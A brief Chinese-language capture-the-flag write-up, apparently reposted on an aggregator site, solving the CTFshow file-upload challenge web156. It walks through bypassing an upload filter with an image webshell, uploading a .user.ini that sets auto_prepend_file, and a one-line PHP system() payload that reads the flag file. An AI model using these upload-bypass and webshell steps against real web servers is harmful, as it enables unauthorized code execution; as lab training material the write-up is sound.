目錄

• 思路
• 總結(jié)

---

思路

這次發(fā)現(xiàn)把shell.php改成png上傳的時(shí)候,提示文件類型不合規(guī),可能對文件頭進(jìn)行檢測,可以利用圖片馬來寫入shell.

https://github.com/huntergregal/PNG-IDAT-Payload-Generator

但是還是提示不合規(guī),直接繞過前端驗(yàn)證,可以直接在burp里面改target和host的值,或者在本地發(fā)包


成功上傳.user.ini

auto_prepend_file=shell.png

在上傳shell.png,發(fā)現(xiàn)多過濾了一個(gè)[],不能傳參了.

稍微改一下代碼,訪問/upload,拿到flag

<? echo 123; system('tac ../f*'); ?>

---

總結(jié)

…

總結(jié)

以上是生活随笔為你收集整理的CTFshow 文件上传 web156的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。